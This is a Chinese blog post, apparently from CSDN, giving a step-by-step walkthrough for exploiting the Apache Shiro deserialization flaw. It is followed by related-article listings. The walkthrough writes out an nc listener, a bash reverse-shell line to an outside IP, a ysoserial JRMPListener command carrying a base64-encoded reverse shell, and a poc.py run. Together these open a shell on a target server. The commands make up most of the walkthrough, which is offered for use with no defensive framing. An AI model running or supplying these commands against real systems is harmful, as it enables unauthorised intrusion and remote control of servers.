shiro反序列化漏洞(简单,详细,附脚本)

最新推荐文章于 2024-09-13 20:56:37 发布
最新推荐文章于 2024-09-13 20:56:37 发布
阅读量1k 收藏
点赞数
分类专栏: Linux软件安装 文章标签: shell shiro 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u014403616/article/details/119157111
版权

第一步:下载脚本

点击下载

第二步:Shell工具打开三个窗口备用

在这里插入图片描述

第三步 第一个窗口执行命令

运行如下脚本然后就不要动这个窗口了,等待最后发生奇迹

nc -lvvp 8088

在这里插入图片描述

第四步 获取Bash重新编码的脚本

将IP替换成你当前服务器的IP 再将这段代码在下边的网址中重新编码,(注:这个IP换成当前服务器的IP不是要被攻击的那台服务器的IP,8088这个端口和第三步执行nc -lvvp 8088 的端口对应的是一个端口,可以不是8088但是这俩个要一样)

bash -i >& /dev/tcp/121.42.230.230/8088 0>&1

http://www.jackson-t.ca/runtime-exec-payloads.html
在这里插入图片描述

第五步:第二个窗口运行脚本

运行第一步中下载的 ysoserial-master.jar 命令如下,红色部分替换为上一步获得的脚本,运行完以后第二个窗口也不用管了

java -cp ysoserial-master.jar ysoserial.exploit.JRMPListener 6666 CommonsCollections4 ‘bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3Mi4xMzMvMTIzNCAwPiYx}|{base64,-d}|{bash,-i}

在这里插入图片描述

第六步第三个窗口运行python脚本

运行第一步中下载的python脚本,如果没有python环境自行百度安装
注:IP指的还是当前服务器的IP不是需要被攻击的服务器IP, 6666 这个端口和第五步运行jar时的那个6666对应的同一个端口

python poc.py 121.42.230.240:6666

在这里插入图片描述

第七步 见证奇迹

打开postman 或者 apipost之类的工具,给被攻击的服务器发送请求,发送之后可以回第一个sheel窗口见证奇迹(正常情况应该已经反弹登录到被攻击的服务器上了)
在这里插入图片描述

刘孟棋
关注
专栏目录
ysoserial-master-6eca5bc740-1.jar
09-22
shiro反序列化安全测试工具, 找了好几个都不太可用, 这是直接从github官网上下载的最新版. 有需要的拿去
JAVA代码审计之java反序列化
知识分享官
09-23 389
序列化数据结构可以了解到包含了类的名称及serialVersionUID 的ObjectStreamClass描述符在序列化对象流的前面位置,且在 readObject反序列化时首先会调用resolveClass读取反序列化的 类名,所以这里通过重写ObjectInputStream对象的 resolveClass方法即可实现对反序列化类的校验。但当输入的反序列化的数据可被用户控制,那么攻击者即可通过构造恶意输入,让反序列化产生非预期 的对象,在此过程中执行构造的任意代码。
Shiro框架以及反序列化漏洞
最新发布
2301_79096184的博客
09-13 895
key值(漏洞点就是这个)
Adobe ColdFusion 反序列化漏洞(CVE-2017-3066)
DaWan
04-13 515
Adobe ColdFusion 反序列化漏洞(CVE-2017-3066)环境搭建漏洞利用反弹shell 环境搭建 使用vulhub进行环境搭建,具体步骤可参考这里。 漏洞利用 环境启动成功,访问http://192.168.36.128:8500/CFIDE/administrator/index.cfm,输入密码vulhub,即可成功安装Adobe ColdFusion 输入密码后,点击OK,页面如下: 需下载内容 ColdFusionPwn-0.0.1-SNAPSHOT-all.j
反序列化测试工具 ysoserial-master-v0.0.5 打包
05-21
用法 java -cp ysoserial-master-v0.0.5 ysoserial.exploit.RMIRegistryExploit 192.168.192.118 1099 CommonsCollections1 "notepad.exe"
Java反序列化利用链挖掘之CommonsCollections3
HongYu012的博客
02-24 419
前面分析了ysoserial的CommonsCollections1,熟悉了一点Java反序列化。本文将继续分析ysoserial的利用,今天的主角是CommonsCollections3. 0x01 环境准备 首先由于override的原因,环境使用的是jdk7u80。利用ysoserial生成payload,并载入调试。 java -jar ysoserial-master-30099844c6-1.jar CommonsCollections3 "open /System/Applicatio
人工智能-项目实践-检测-Apache Shiro 反序列化漏洞检测与利用工具.zip
12-23
Shiro_exploit用于检测与利用Apache Shiro反序列化漏洞脚本。可以帮助企业发现自身安全漏洞。 该脚本通过网络收集到的22个key,利用ysoserial工具中的URLDNS这个Gadget,并结合dnslog平台实现漏洞检测。漏洞利用则...
shiro反序列化工具,加强版
12-27
总之,Shiro反序列化漏洞是需要重视的安全问题,无论是开发者还是安全专家,都需要了解其工作原理并采取相应措施来保护系统不受侵害。通过使用加强版的反序列化工具,我们可以更好地理解和防御这类漏洞
一道shiro反序列化转型引发的思考 .pdf
09-05
总之,这道Shiro反序列化转型的问题提醒我们,Web安全是一个动态且复杂的过程,需要持续关注新的漏洞和攻击手段,并结合黑盒测试、代码审计和业务风控等多方面手段来提升整体的安全防御能力。同时,对于企业来说,...
Apache shiro1.2.4反序列化漏洞(CVE-2016-4437)需要用到的python脚本
12-04
Apache shiro1.2.4反序列化漏洞(CVE-2016-4437)需要用到的python脚本
shiro反序列化脚本.zip
07-28
在这个场景中,poc.py很可能是用来构造并发送利用Shiro反序列化漏洞的恶意请求。Python脚本可以方便地与Java环境交互,例如通过网络发送序列化数据,触发Shiro框架中的漏洞。 在标签中提到的"反射"是Java编程中的一...
ysoserial下载
12-26
java反序列化漏洞检测工具,可以自动生成playload,测试用的 有需要的同学拿去用
java反序列化工具ysoserial.jar浅析
qq_50854662的博客
02-13 717
java反序列化工具ysoserial.jar浅析
[Vulhub] Apache Shiro 反序列化漏洞shiro-550,shiro-721)
weixin_45605352的博客
05-15 3015
0x00 漏洞描述 Apache Shiro是一款开源强大且易用的Java安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。 Apache Shiro 1.2.4及以前版本中,加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令。 0x01 影响版本 Apache Shiro <= 1.2.4 漏洞特征: shiro反序列
java安全(六)java反序列化2,ysoserial调试
weixin_45694388的博客
04-19 3994
ysoserial 下载地址:https://github.com/angelwhu/ysoserial ysoserial可以让⽤户根据⾃⼰选择的利⽤链,⽣成反序列化利⽤数据,通过将这些数据发送给⽬标,从⽽执⾏⽤户预先定义的命令。 什么是利⽤链? 利⽤链也叫“gadget chains”,我们通常称为gadget。如果你学过PHP反序列化漏洞,那么就可以将gadget理解为⼀种⽅法,它连接的是从触发位置开始到执⾏命令的位置结束,在PHP⾥可能 是 __desctruct 到 eval ;如果你没学过其他语
jrmp协议_Java远程方法调用RMI利用分析
weixin_28358083的博客
12-24 628
前提了解JNDIJNDI(Java Naming and Directory Interface,Java命名和目录接口)是SUN公司提供的一种标准的Java命名系统接口,JNDI提供统一的客户端API,通过不同的访问提供者接口JNDI服务供应接口(SPI)的实现,由管理者将JNDI API映射为特定的命名服务和目录系统,使得Java应用程序可以和这些命名服务和目录服务之间进行交互。JRMPJav...
【转载】ysoserial反序列化工具打包jar文件流程
mingyqf的博客
03-30 1950
ysoserial反序列化工具打包jar文件流程 [Fighter安全团队](javascript:void(0)😉 2021-01-31 22:28 00 — *前言* 身边很多朋友都不懂怎么将源码项目打包成jar文件,那么接着上一篇的环境就简单讲讲jar的打包流程,毕竟在github上有些项目都不是打包好的。这里以ysoserial为例,项目下载地址:https://codeload.github.com/frohoff/ysoserial/zip/master 01 — *idea打包jar * 导入
ysoserial java 反序列化 Groovy1
whatday的专栏
06-23 1895
ysoserial简介 ysoserial是一款在Github开源的知名java 反序列化利用工具,里面集合了各种java反序列化payload; 由于其中部分payload使用到的低版本JDK中的类,所以建议自己私下分析学习时使用低版本JDK JDK版本建议在1.7u21以下。 此篇文章为java反序列化系列文章的第一篇,后续会以ysoserial这款工具为中心,挨个的去分析其中的反序列化payload和gadget,讲完该工具后会继续对工具中没有的java 反序列化漏洞进行讲解,例如 FastJs
Apache Log4j Server 反序列化命令执行漏洞(CVE-2017-5645)复现
thelostworld
04-15 1665
由于最近项目遇到这个漏洞,复现学习一下。一、漏洞介绍Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码。二、漏洞环境https://github.com/vulhub/vulhub/tree/master/log4j/CVE-2017-5645执行如下命令启动漏洞环境d...
shiro反序列化漏洞工具
05-23
Shiro 反序列化漏洞指的是 Apache Shiro 框架在处理用户输入的 Session 数据时没有正确地对反序列化进行限制,导致攻击者可以构造恶意的序列化数据来执行任意代码。攻击者可以利用这个漏洞来获取系统权限、窃取敏感...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值